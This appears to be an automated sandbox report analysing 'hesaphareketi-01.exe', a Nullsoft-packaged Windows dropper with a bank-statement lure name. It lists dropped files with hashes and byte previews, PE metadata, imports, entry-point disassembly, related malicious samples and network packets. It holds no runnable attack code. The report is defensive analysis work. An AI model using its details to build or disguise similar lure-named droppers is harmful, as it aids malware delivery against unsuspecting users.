                                                                                    Preview:......z.e9_..."..K........Q...p.g.'.........o......|A....M.../................_.....J.....T.....m........... ....*!...!..5..............A...........#...........)....(.............=.........?+....'3........B..,..q.....%......R.D.....].J. ....o.....Q.....Z............`n...'......)................2.......F...........U.1......~............K.../........y.x....^.........T_c....:5.............s..........#...~.........N..<..H...,............7.....e..D3:............|..n..9C...K.....8........|....$D.......|}~..i...3..'........$...G..y.....[....Y.oI|....E.......f....E..U..3.....s.I.wO;.L.......I........1..e...R.z..F]G.......Jc...........l.{.x....j............c.....RP.....$...6.."........c...y...(-..............G_..[.@....PP./....B....A.......&................D....&.9...................q...2...5...................}..-..o..................f...z............6.e..rK..R....R.K[.......[M....Q.....Q.......C...R........@..n.......\.....^pB/...............{...<..Y.............n....z.............

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Outboasted\Nrc\Unbenighted145.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):602
                                                                                    Entropy (8bit):4.244948484312676
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:4SBV6H1OEwn+hdM1mAJ9wWkhuDUfwyIcFeHkw4ObFCPPe3Q7:6H1DwudiJ9wWSuDyIcQQG0ug
                                                                                    MD5:DD810F3906C78210F7E558F36089A573
                                                                                    SHA1:4A081A73FE779256588C821D8B31FED789A412CD
                                                                                    SHA-256:576235D08666124922DD80CB06400C07C201AD9EB0F00190E6131E743D87294C
                                                                                    SHA-512:B6780F3D56A715C1909FC3DA7C6A64B0F85CE98B5EAA06927F77A7530BE00A70619C26E369275CA7C2D457FD5C4A1F015B440B3C68697DD8BD14E2D2976BA07F
                                                                                    Malicious:false
                                                                                    Preview:kelspr ergometerets rectischiac dasyproctidae,ggeretter blindforsgene nomineret positivisternes imposable kremersite afdragende blystberierne guadagnini bindselets blokkedes..fortuneless eposser ajlebeholderes fremdateringerne euphemious monice,overemphasized amalgamatises deflate minirecessions fortllingens axwise runddyssen overvindelsers colonnades reissued recutting..miljfarligere holsom kommandanter undermundsproteserne banenettet tuberculosectorial ectethmoidal.krnen lubritorian arbejdsbesparelsr ritraadene profitmagere tnkepausen gonapophysal cuter nonobjectivism maray belay ynkeligheds..

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Outboasted\Nrc\brants.pap

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):7475
                                                                                    Entropy (8bit):4.881502534299953
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:yN7xnZoHP/U/sHWGWjcAZ9Nh2Nj4TqmuQ6dE5X9puv1sCCx:yDZoHP/PpMXNhgpp1dElUsJx
                                                                                    MD5:30730743350213A41627BECFB73A1045
                                                                                    SHA1:79F8918DE9FE680057FDC763ACAF3DA3B5915AC6
                                                                                    SHA-256:5E3B988A1303C6C25638764C9AA4D124FD890D13197A002AC0A85D4BFDD15652
                                                                                    SHA-512:7AC83ED4CC0BEFBD956D2501906118BFB52D48FE5DD49B53CC1406F985EC29B469117B22CE2ABB8E4403BD77AD3813ED2707014111A0B9CE74A4D6F877C151C7
                                                                                    Malicious:false
                                                                                    Preview:.:..P*....t.............3.r................-..tx..d.....:...>...I..6...^......4 #.....................xl.O...`...q.H.<............7.s.....7..i...Wz..fa.....}....)t.Q..~..c.........V..7...J.....[j...................C7.......D......G.......l.T........F........W&.1........e...m..._}6.......}....'...#...T...LlN..........P..).1...B..!..B.N....|...C.....B...+...;.....................F.f........ ....-.............LQ...................../......y....mp.`............f.q....'..H.J..[...W....r.....f...M.9.......~5..+.....{D....{......>.g...S$...2..#5..\.......U. ..... ....!w.....Y...YZ&.y........+..l.v.......o....._..a...\...........q.........[........+........D$...........g........6.f...R..........QY....7..{..W....P.R.]......b..<.{;U......~..\.........x...E...........................E..Y..Z.w......'........".+...g8}..i.............................p..X.B...U........g.V..W..w.......i.......:..7..1..J..........[...I...\.....2....6.....?.U..tU..t........\...........5..s.7........!......

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\museumize.out

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):7059
                                                                                    Entropy (8bit):4.909564947309597
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Y0HDwecd6ktzCkqDYIKhTfRXXwhJOi1bFiuf+C:YoHcd6ktzCYIKFKPO85Df+C
                                                                                    MD5:81688D1154ABD744BD321B13DC13DB19
                                                                                    SHA1:E0AAA8567E16EB16A1EC2634F27B221B9321996C
                                                                                    SHA-256:BBA1EF4BC87F4DCB6CECB2F101EE7E1720836AB4EA9F9BFA357983A59343DA01
                                                                                    SHA-512:84FB78441857DF5E43AEAB9FC2B9B8632AD8E3339D37D5AE9B31BC23D25D82F6F96B9ADF839B27272581D4ED21436C30E26639EC6340D86330E6ADEA32218A07
                                                                                    Malicious:false
                                                                                    Preview:............k.......R`................f.z.........o..V........=.*........Q........@.........4.............;O..1.....B.K........u.......N.$.........q..._..........5.............r.7..o........A..8../g.q...B...._.|.....Z.."....].n./....|................~.........1...N.....^.....F..... .g....p...0......8.....................&......(.\..J..C..P.>...-..~e...4..............................t........................p.Qb......g....m....-v................LYV......8......r..O.....w8.................T.....P.9....=.....3..AM.........j........F....mr..........$..(............A.L.....Q.....&....K.{.........L.~U..........H.a...._..........q.....,../.!C>....`.).......k....'.P........$.Sl.............\....1V......#p:aT.)...........P...a..........d...|...0..!p...........................}..............!3.`.r..a..l...................!%......L......3-j..0k...................&.5s........I...a_.".......k..........r.B...Y...^)..........i.,....y....}...n..I...........#......c.....r..........fE..^..

                                                                                    C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):5632
                                                                                    Entropy (8bit):3.815222563094885
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:S46+/pTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mzofjLl:zfuPbOBtWZBV8jAWiAJCdv2CmmL
                                                                                    MD5:376C1B784A3CCA9D10BA4CA5D8CB55D2
                                                                                    SHA1:AD12F8EBAB5B4B58EB7D5368469E82E2442B089F
                                                                                    SHA-256:5BEE24FEF5C0F643ADC7EE02CCB6E80A72A4EB30D9D326023AC03F0FFBC4E624
                                                                                    SHA-512:6F02F0D878C228DE114DEE6B0DF85152745B43893A252B2E9C309BA943EA56AB1EE678E42D9B0A89162E2BDA627D396C2933C02E1C42D0169AC6E05FF3AF4BBB
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Liquidacion_por_Factorizacion_de_Creditos.exe, Detection: malicious, Browse
                                                                                    • Filename: Technical_Offer.exe, Detection: malicious, Browse
                                                                                    • Filename: justificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 00158007317748300pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 475128640_20231129152352507pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: recibo_vencimentopdf.exe, Detection: malicious, Browse
                                                                                    • Filename: justificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 00158007317748300pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 475128640_20231129152352507pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: recibo_vencimentopdf.exe, Detection: malicious, Browse
                                                                                    • Filename: Ticari_Hesap_#U00d6zetinizpdf.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia-16.280,00_EURpdf.exe, Detection: malicious, Browse
                                                                                    • Filename: Ticari_Hesap_#U00d6zetinizpdf.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia-16.280,00_EURpdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 84LQ5L8BA4.exe, Detection: malicious, Browse
                                                                                    • Filename: 84LQ5L8BA4.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....uY...........!........."......?........ ...............................p......................................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.659384359264642
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.740047363499213
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:hesaphareketi-01.exe
                                                                                    File size:368'795 bytes
                                                                                    MD5:e96bd1c59a8e67c4ab01a9327c98aab7
                                                                                    SHA1:184bfeb63316cb4aec59ee6038e1f0912541cbe9
                                                                                    SHA256:0b145928bcccd1f9510ef2744ef2487a38cdcdcc6b8595995c491c29f97f55e9
                                                                                    SHA512:a1afe26bcc1b47d7d26cb8b10c33bc853d6b7a3f57b27e20edfac2d98ea8aaf01244d0f22e2dc49910c5697002503f4e065b64a6fc6a1e609ef5cb9784968c87
                                                                                    SSDEEP:6144:6Q606xNlmkDnWv/NIPpWUELI8kMcpBPJi2IVWSF3E5jOWrakDkf3N:UFLWHopWUELI8kLpNJi2aT6OWr
                                                                                    TLSH:AE74021E3611D4E6F98883B02B3AAB0F599F6C4712460A0A3771777C6B39693CE1F9C5
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........

                                                                                    File Icon

                                                                                    Icon Hash:3298cc6662ccd83a

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x403373
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004080A8h]
                                                                                    call dword ptr [004080A4h]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [00434EECh], eax
                                                                                    je 00007F4B24BE73F3h
                                                                                    push ebx
                                                                                    call 00007F4B24BEA689h
                                                                                    cmp eax, ebx
                                                                                    je 00007F4B24BE73E9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004082B0h
                                                                                    push esi
                                                                                    call 00007F4B24BEA603h
                                                                                    push esi
                                                                                    call dword ptr [00408150h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F4B24BE73CCh
                                                                                    push 0000000Ah
                                                                                    call 00007F4B24BEA65Ch
                                                                                    push 00000008h
                                                                                    call 00007F4B24BEA655h
                                                                                    push 00000006h
                                                                                    mov dword ptr [00434EE4h], eax
                                                                                    call 00007F4B24BEA649h
                                                                                    cmp eax, ebx
                                                                                    je 00007F4B24BE73F1h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007F4B24BE73E9h
                                                                                    or byte ptr [00434EEFh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408044h]
                                                                                    push ebx
                                                                                    call dword ptr [004082A0h]
                                                                                    mov dword ptr [00434FB8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0042B208h
                                                                                    call dword ptr [00408188h]
                                                                                    push 0040A2C8h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x13970.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x65ef0x6600False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x149a0x1600False0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x2aff80x600False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x350000x7f0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xb40000x139700x13a00False0.5700512539808917data6.545380786031907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xb43580x8592PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004094285547172
                                                                                    RT_ICON0xbc8f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.21120689655172414
                                                                                    RT_ICON0xc0b180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.25975103734439836
                                                                                    RT_ICON0xc30c00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.2865384615384615
                                                                                    RT_ICON0xc4b280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.33724202626641653
                                                                                    RT_ICON0xc5bd00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43155737704918035
                                                                                    RT_ICON0xc65580x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.4924418604651163
                                                                                    RT_ICON0xc6c100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5460992907801419
                                                                                    RT_DIALOG0xc70780x100dataEnglishUnited States0.5234375
                                                                                    RT_DIALOG0xc71780x11cdataEnglishUnited States0.6056338028169014
                                                                                    RT_DIALOG0xc72980xc4dataEnglishUnited States0.5918367346938775
                                                                                    RT_DIALOG0xc73600x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0xc73c00x76dataEnglishUnited States0.7542372881355932
                                                                                    RT_VERSION0xc74380x1f4dataEnglishUnited States0.532
                                                                                    RT_MANIFEST0xc76300x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 4, 2023 12:03:14.358510017 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.358556032 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.359066963 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.374075890 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.374089956 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.590795040 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.591013908 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.591599941 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.591828108 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.672085047 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.672101974 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.672420025 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:14.672652006 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.676079035 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:14.716691971 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.715116024 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.715357065 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.715538025 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:15.715626955 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:15.715708017 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:15.715708017 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:15.715775013 CET44349744142.250.65.174192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.715981960 CET49744443192.168.11.30142.250.65.174
                                                                                    Dec 4, 2023 12:03:15.888389111 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:15.888494015 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:15.888824940 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:15.889328957 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:15.889410019 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.192028999 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.192370892 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.194169044 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.194345951 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.200624943 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.200639009 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.201122999 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.201376915 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.201812983 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.248569965 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.530536890 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.530775070 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.548249960 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.548492908 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.566077948 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.566260099 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.566260099 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.574856043 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.575105906 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.575105906 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.583652020 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.583964109 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.583990097 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.584233999 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.592498064 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.592775106 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.592802048 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.593204021 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.652734041 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.652908087 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.652928114 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.653142929 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.657130003 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.657427073 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.657449007 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.657740116 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.666130066 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.666415930 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.666445017 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.666670084 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.675175905 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.675434113 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.675477028 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.675750971 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.684401035 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.684685946 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.684745073 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.684942961 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.684987068 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.685226917 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.693042040 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.693267107 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.693315983 CET44349748142.251.40.129192.168.11.30
